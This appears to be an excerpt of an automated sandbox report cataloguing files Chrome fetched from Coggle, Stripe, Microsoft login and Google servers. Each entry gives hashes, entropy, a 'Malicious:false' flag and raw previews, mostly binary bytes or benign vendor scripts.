                                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:dropped
                                                                  Size (bytes):6280
                                                                  Entropy (8bit):5.233496108592213
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:F711CA14E01C3B624F406D04BF6D9503
                                                                  SHA1:09A3C26E7F5F9FB28A82A1C3A5379770CD683718
                                                                  SHA-256:39AB477737092FAFCEE1E208BDDB674EF65511A050828394031C623AA6958CE1
                                                                  SHA-512:F54FD2110EBC0F68C42C6C104CD7788109A85A3EFB57A61E55A075C7E5C0D85F39AF7611F5692CEBCA41C48E607A4E33AB677836106443E84780426B11817BD3
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="228px" height="228px" version="1.1" viewBox="0 0 228 228" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><title>Coggle Logo</title><defs><linearGradient id="a" x1="1287.2" x2="1287.2" y1="205.47" y2="524.97" gradientTransform="matrix(.094944 0 0 .41493 148.01 -159.16)" gradientUnits="userSpaceOnUse"><stop stop-color="#81c652" stop-opacity="0" offset="0"/><stop stop-color="#c3d842" offset="1"/></linearGradient><linearGradient id="h" x1="2396" x2="2405.6" y1="178.16" y2="619.69" gradientTransform="matrix(.099631 0 0 .39541 -133.74 -164.56)" gradientUnits="userSpaceOnUse"><stop stop-color="#a0e267" offset="-99"/><stop stop-color="#4e9dcd" offset="1"/></linearGradient><path id="f" d="m0 35.001c0-19.33 15.671-35.001 35.001-35.001h158c19.33 0 35.001 15.671 35.001 35.001v158c0 19.33-15.671 35.001-35.001 35.001h-158c-19.33 0-35.001-15.671-35.001-35.001v-158z"/><linearGradient id="c" x1="-27.5" x2="257.5" y1="-27.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):764
                                                                  Entropy (8bit):7.441112211797175
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:5C65770CB532863AAC337442EF948988
                                                                  SHA1:971CEC6094E4B3E44B113E43D390A4DFF1BB77F0
                                                                  SHA-256:F61E03DA6E89DACA9CB70B4BB5B0E4EEEEE57D2D648E2B2ADC43CCFC7C9BD8DB
                                                                  SHA-512:DAEBD75B395BAB42C906D8528850DBB8051DB505BE240F92CD4E48841C04B28D50610514782B0D96C18D29E7DEAD615A727CF73F023073C9CBBD38D05E0E6D23
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://static.coggle.it/assets/i/downloadc16a98f0.png
                                                                  Preview:.PNG........IHDR...@...@......iq.....sBIT....|.d.....pHYs.........V0......tEXtSoftware.www.inkscape.org..<....yIDATx....@......U:.U.2.........qa.P..6@.......A....<.......4 Q,....$>......g..y>)......=...Qg........q.H.H....... - .+@Z@.W...4..i.ij_@....f.g.......zd...k.0.)".-8v........i.i\........q.H.H....... - ..z?`:..t:...N..9......s..RJ.(..+`2..L.4....o......6..."z.n.o.r.4O. ...\...`.\z..(.....k.Rj..5.2......\3.`.$..|...=.{.+/....(Z.i:..k.{....k....`...Dt.b..j.........}..<...'[.......Y.?..q<.v....._......DQ..p.@R..^.!...(.....E...lt.g....}.>......B...XP.`y3.........]..s.Jv...h.h46.......^....l....{.WpXB. a.o.f...m;..R.?Dj_@.......z.~.C..D.q0..U.\@.$'[...9ea..:r*....."..C.$...epw.i.i\........q.H.H...........n....Uu....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):200
                                                                  Entropy (8bit):4.942373347667344
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:3437AADDCDF6922D623E172C2D6F9278
                                                                  SHA1:F69066CF20141AC93418102D3EEE7C0225B8A623
                                                                  SHA-256:35DCC382EB69D00369D708708CDC545F3968B68FA5BBE3E728D11FEDD04F93BB
                                                                  SHA-512:2DAE5C5C30C6A0E763D8128F2CE1D467EAD432E582AB4EBB68E23991DB08F57490ABC0EED805FD33FAB5503C1737D9D47D4CC1090AE15D7391593FBB295D66E7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html
                                                                  Preview:<!doctype html><html><head><meta charset="utf-8"/><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js"></script></head><body></body></html>
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                  Category:downloaded
                                                                  Size (bytes):116343
                                                                  Entropy (8bit):7.997640489040715
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                  SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                  SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                  SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                                  Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                  Category:dropped
                                                                  Size (bytes):49911
                                                                  Entropy (8bit):7.994516776763163
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                  SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                  SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                  SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:GIF image data, version 89a, 150 x 150
                                                                  Category:dropped
                                                                  Size (bytes):8936
                                                                  Entropy (8bit):7.6832401832571
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:2E4442074A6B1ACA6AD97985D46034B3
                                                                  SHA1:3FD93318F9E3FB5BEDE21E5DCC06FE86FEFC60B1
                                                                  SHA-256:F1153A10165B8C76D68B3BEF4FDDE099C4ADE4D81945E59A0F41AA6E341AC7F0
                                                                  SHA-512:0B2B5D231C13444FD2BE10CE1B6ADA974E5087CFBD4D9617D29DF4C7B53C781B047D262B5AE81D47E34A992F054A880FC8461B88269E507567D4C0F7088F4CEB
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:GIF89a.............!..NETSCAPE2.0.....!.......,...........................H........L..............L*.....J.....j..........N....................(8HXhx..........)9IYiy..........*:JZjz..........+;K[k{..........,<L\l|..........-=M]m}.X..!.......,L.........7....{....IU..9..Y_(n..%'..d..;..y...N<.......C..\.U..!.......,U.........6...........xo.yY.....e.FM...4.A..8.'......q.!a(.....!.......,_.........,.......k.......1 ..........BnL.....r.1.....!.......,h.........:....."zOZC.y..Y`(9...b......4+r...s.3.(..,..!..%p.tF...!.......,p.........8.......c..g3...Q`%..c.....o.~5.Nr..:...B.(<"....0)..!.......,u.'.......F.......k....fo..Y](Qdd.K.&c{e......x.. ..bt.!.d.m....'z....j.b..-.g,..!.......,z.7.......9........I.k/...| .8c(.@z.c.V.V.S..x..x..m.....9.Q.%.y|...!.......,|.C.......8......d....^z..Q...exzA.....f.L.f......!B..h.!..%..(..!.......,{.O.......9L...h..4.J..z..5`HnWi....,...).<cx....[._.!.c.1.C!..x...!.......,x.X.......6....`.b{..c-.r..UPH....-I.1..nM...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 150 x 23, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):2887
                                                                  Entropy (8bit):7.921971045388986
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:C0AB27A82E3D69DD05382A1C21310CB4
                                                                  SHA1:767674AB85F5A310027D2206C36E93081CFB6C28
                                                                  SHA-256:8EAA39C57FCF1F26B3C22A6870871983B9AEDBC6E4D3D02930CD7B18E3E2E944
                                                                  SHA-512:AFE95713D35EDADB88A7F58A1E16BAD1D3593B27D0A961563270E144228390FF2C94FF44DEC5EF03F5F34710ECCCFCB4E2851D53B0B1875D51B5E762AE9BB4BC
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR...................sRGB.........IDAThC.wXTW.....0H.(.(.DD...$.(..*....$*j..{..l.+`...a.Ib.#.]....(*...a....j4.0.1......;.{..w.gFRQQQ..2E......2rDM.....2..L"`...d.....g.......d.Z.C.....e.dee.P(..Z.......7n<....:be%.U.... 3...V.._...,.Y.TQV.A..!|..I0.I.ce.........."<..Dl...NLL.qq.,_..S.N.2.p;~.8,-.,\..a..,%%....?./z=e?..N..v..........3VU.B.C.,{L ..B".>...Q.:t.2c.maBX7.-.A..x...w..|./......5....2.....'.....5k.V.+5...;.,...N^^....E.#G..[..2....W(J..6...=.:%..+`&.*....Zi..N~:..1C..-.q..j.EN....tr.q....&..F..Y...z.|.>u..g.V...g..*.:.=#\F.+b.&B_o.k..yw.z.... y..Ls.F...vq ...F.....o....V.F.ILL.u.N.V......L.Bll.{.....V..D.....:.P.(...K@.R..l..N.$tw......"h..../,_..A.2r.......k..?&.Y.9.B.b..U.y..i.o#qqG.;....E}Y..._G....}....C..".gNG.{G.)..l..{..?.....F.FB......[U......v......>\..O...8.[.z.`n...x...R/..w......Do.......`...;y.d....5X....1..i.)?yI|d;2..9c....8.').../ZA.......~....Q.O/.e...>V^..l.h.......}......X...r.W(w..v...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):72
                                                                  Entropy (8bit):4.241202481433726
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:JSON data
                                                                  Category:downloaded
                                                                  Size (bytes):474
                                                                  Entropy (8bit):4.428392392239425
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:956F35837BB253AA0CEC03AAE256A074
                                                                  SHA1:5642202DC1860C3B6428BA6B83660012C19D947A
                                                                  SHA-256:BDBCEEB1F28B7487BDA32BA785CE5E26FA0ED9859235701700633C4E3FF983B4
                                                                  SHA-512:E66A16AAA26EDCEA0432C19BE0E223010B5080A835FF7564DB18ABE494A97D89DFE912D5F8508C2D1D5E3F24D401F5B23449BD5259E7D7587A31A80570ED4A73
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://js.stripe.com/v3/.deploy_status_henson.json
                                                                  Preview:{"canaryPercentage":0,"deployedRevisions":["e7a8c6762a795a8aa185bf3e222ce7d1f5f2b438","97638f4c46fd743bb6432d3f59181bc1bc8d7756","946d9f95b9be00e29dea78288c3125b314bbde73","81cb80e68bc2bd06293be137e805cd49186a4e8f","76922d387fafd63b4dd231e4637c6912fe3610a0","4b9a5a2ae33c52af3f7c93bb2ee9a461aa4a1c8c","b55852ae2b0148acf1bf624347f6cc705bfc2aed","4b9a5a2ae33c52af3f7c93bb2ee9a461aa4a1c8c","04c13ab290f73533d3e9919307bd8ff46067660a","796a7b92dfbb920cceb8b4b9098b99cd513a500f"]}
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                  Category:downloaded
                                                                  Size (bytes):122515
                                                                  Entropy (8bit):7.997419459076181
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:AC9A6ED508328361A4C9530325A94076
                                                                  SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                  SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                  SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                  Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (526), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):526
                                                                  Entropy (8bit):4.844995662196588
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:D96C709017743C0759CF3853D1806BA5
                                                                  SHA1:72E21587610C49C8305A55E71F73FA88ED618205
                                                                  SHA-256:BA2338AA6670580269C762F51C4291DAEF913201AA8F4D4FD166C1A878262652
                                                                  SHA-512:974E260ED8BD1D99628FC3248F07179F6EA228E37A6B9D3EF906DBA57571F2DF54D73F93D1F3460902D28A90BD4793BCA35477B2EF8FBF424B9112147F04BCCF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js
                                                                  Preview:!function(){"use strict";var e="https://m.stripe.network",n=window.location.hash,t=/preview=true/.test(n)?"inner-preview.html":"inner.html",o=document.createElement("iframe");o.src="".concat(e,"/").concat(t).concat(n);var i=function(n){if(n.origin===e){var t=window.opener||window.parent||window;if(!t)return;t.postMessage(n.data,"*")}else o.contentWindow.postMessage(n.data,"*")};window.addEventListener?window.addEventListener("message",i,!1):window.attachEvent("onMessage",i),document.body&&document.body.appendChild(o)}();
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 10 x 81, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):61
                                                                  Entropy (8bit):4.022997040570906
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:81394DDF6522DBCA953B7745CEA26F53
                                                                  SHA1:EFA80189219898A7EF5A025441865FC120E307CE
                                                                  SHA-256:00EE6403F2EBD94FEBFE5991B90076AA510D2783A82654DFBC567714CA4FE686
                                                                  SHA-512:39FBE8DD0A4CF1E22B309405AE19D59A7F86510A165D7AF13F83F4A017F902474CC2D23061E17D1794A10ED78B351133975BF0F364A818129DE4F29B400B8423
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR.......Q.....d.......IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (7785)
                                                                  Category:dropped
                                                                  Size (bytes):2058806
                                                                  Entropy (8bit):5.17991867708284
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:B29CAB6A9A874739C00E31A0EF149E0E
                                                                  SHA1:B6B05377F668BB40A2DCFF02E273AD2B044D0BE1
                                                                  SHA-256:AF61E4225FE84EA6B410E5E5409B7BEDC75A2BDB63F3D4D0B47F1A9333CA271C
                                                                  SHA-512:7A16C250F5C2CEEB2E0A964E64EF8043635E9EFB5FE4F11F3AF85D1BA1CBBFE33F86929595C0562BDD1032542FB6F940691F5A0E36E18EB746ADFD4062E2FCB0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:<!DOCTYPE html>.<html. class="MktRoot". lang="en-US". data-js-controller="Page". data-page-id="Home". data-page-title="Stripe | Financial Infrastructure to Grow Your Revenue". data-loading.>. <head>. <script>window.__capturedErrors = [];.window.onerror = function (message, url, line, column, error) { __capturedErrors.push(error); };.window.onunhandledrejection = function(evt) { __capturedErrors.push(evt.reason); }.</script>.<meta. name="sentry-config". data-js-dsn="https://7cd38b0eb2b348b39a6002cc768f91c7@errors.stripe.com/376". data-js-release="b29681e4443d5c6610e4353d9c1b82178d4fa93d". data-js-environment="production". data-js-project="mkt".>.. <meta name="experiment-treatments" content="acquisition_top_cta_change.control.ursula.bf145adf-98c9-429c-9d9d-ed81c321650e.a,wpp_homepage_title_copy.control.ursula.d37d1ab3-1672-4d6d-b34e-635319b2df31.a,acquisition_jp_homepage_holdback.control.ursula.41e69ac3-4b09-4c45-91b7-0033d3ce202e.a,acquisition_text_scaling_with_viewpor
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                  Category:downloaded
                                                                  Size (bytes):621
                                                                  Entropy (8bit):7.673946009263606
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):96
                                                                  Entropy (8bit):5.220277803943091
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:46520767C8D53BEFDB7688E66411794F
                                                                  SHA1:964DB4925CE2A3D3C74329F9E7DE422EAB1CB4C0
                                                                  SHA-256:2A3BB51F716E053996B41395A6E2F4F49419754C324C02C6693BAFD449867E3D
                                                                  SHA-512:59ED863313B71B668AC6A6516162A07AC01F1E882747171F555592DE64B2D0DEB8A9CFA29BF014A1D23147D760EA573295A9C4E829BA6AF3708CC3BE3B78CF19
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                  Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O34nPCJcXRABGP////8P
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65524), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):1076142
                                                                  Entropy (8bit):5.453363535745632
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:B168AFFF80C78C94ED1C49FA1C993A5C
                                                                  SHA1:EA4A743041D27323F5FE674BC25172D215CF86FC
                                                                  SHA-256:60A1B5DDFE8B8812C0A25B4BD71A7EB0AA4BAE8919C8433FD3B8BE8023494317
                                                                  SHA-512:2902941CA13F6DB89C3EF85B7CEB2A24BCD6716FFDC9BB23E08B67925DC9651D0643B81CE8C860EA80D541CF48A469A81EDFCCEC6BDCD34BE9DE668D680925E3
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://static.coggle.it/assets/web-main.34e886dad9998edc.js
                                                                  Preview:(self.webpackChunkcoggle_frontend=self.webpackChunkcoggle_frontend||[]).push([[347],{6349:(t,n,i)=>{(function(){var n={newline:/^\n/,code:/^( {4}[^\n]+\n*)+/,fences:d,hr:/^( *[-*_]){3,} *(?:\n+|$)/,heading:/^ *(#{1,6}) *([^\n]*)(?:\n|$)/,nptable:d,lheading:/^([^\n]+)\n *(=|-){2,} *(?:\n+|$)/,blockquote:/^( *>[^\n]*(\n[^\n]+)*\n*)+/,list:/^( *)(bull) [\s\S]+?(?:hr|\n{2,}(?! )(?!\1bull )\n*|\s*$)/,html:/^ *(?:comment|closed|closing) *(?:\n{2,}|\s*$)/,def:/^ *\[([^\]]+)\]: *<?([^\s>]+)>?(?: +["(']([^\n]+)[")'])?imgsize *(?:\n+|$)/,table:d,paragraph:/^((?:[^\n]+\n?(?!hr|heading|lheading|blockquote|tag|def))+)\n?/,text:/^[^\n]+/};function i(t){this.tokens=[],this.tokens.links={},this.options=t||g.defaults,this.rules=n.normal,this.options.gfm&&(this.options.tables?this.rules=n.tables:this.rules=n.gfm)}n._imgsize=/(\s+([0-9]+)\s*x?\s*([0-9]+)?)?/,n.def=h(n.def)("imgsize",n._imgsize)(),n.taskbullet=/(- \[([xX/\\ ])\])/,n.olbullet=/\d+\.|taskbullet/,n.bullet=/(?:taskbullet|[*+-]|olbullet)/,n.bu
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 150 x 31, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):6529
                                                                  Entropy (8bit):7.965686593133637
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:731DB1A148D33B3D4FF54527CA2B4298
                                                                  SHA1:525DD1728C480E418FD01C38F184F5760701AC3A
                                                                  SHA-256:C955888D5731BB1BC52D6FBAE69ADED7F1CF46204F41AA1EFC590C657CE96651
                                                                  SHA-512:DDB36583942B3A80FAAAF4F110CC3C9CD2E46A1F343AAF5D32F535E5749843225F8C21AB8A45A1F4ADCBA0D109C804EAEDCD86B9C38E261F355481D4C16BE2BC
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR...............4.....sRGB........;IDATx^..t.......+3y..d.^.!....AP.V.........-...`Q.Tz.Z...h..V[.@.Z..V.....1A..B !.yg2..q.9.I&1....ky.....>.....}>.;.*..l...._>....:..U|.l....O.l..{..|..Q....u.C!L,...0%...v`E.....i..bX..dhn.......O..S-.4...$..[l.D....9.....7.?..Ua_.1.....6.Q...3m..J..)y...hB.M...79.i.q.Q..5b...d..NA....i.tMq....;<......N7oo .Gk.{.n....i.U.W.}.x.u.J..X.../+..>>._........C.v...."O.,...0I......s.....d..8.....>.b..{>._<+.......C..2.....%QP..':F....%......j...3.+.......].T...z.3]e..S..._...:............+O.j.Xv..<;..=..../<.*.v..(..e3v.@..UH.....o./.*'..ge..]....3.....aG..3...#b.3..K..L.?....D.../..u.,.....l..~)..U...%bW.5.,..7..X.Lj..#b2.o>.F.a..\..$.{'..|...<`.Z.!ro.6........#e.v....4...WP...`..a.,VBz.....\R....X.../.I.."(!...._v9.u..v.ao.........Y...:....+....4..I\v.8...e.=.^RD...ZZ.}T..6B.F<...i..jq$>~..{nQ...T.....D.4...(]..P.q9~.\.....]G...._.i.e..1u*.#).=l........L....&...z.a1m..V.6..M.......FiY.;.1..n"..
